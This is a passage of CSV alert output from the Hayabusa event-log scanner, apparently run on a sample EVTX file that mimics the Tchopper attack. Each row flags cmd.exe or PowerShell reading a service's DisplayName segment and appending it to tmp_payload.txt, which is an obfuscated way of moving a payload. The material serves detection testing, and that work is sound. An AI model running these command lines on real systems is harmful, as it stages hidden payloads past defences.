0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 
0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe 
| PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:06.905 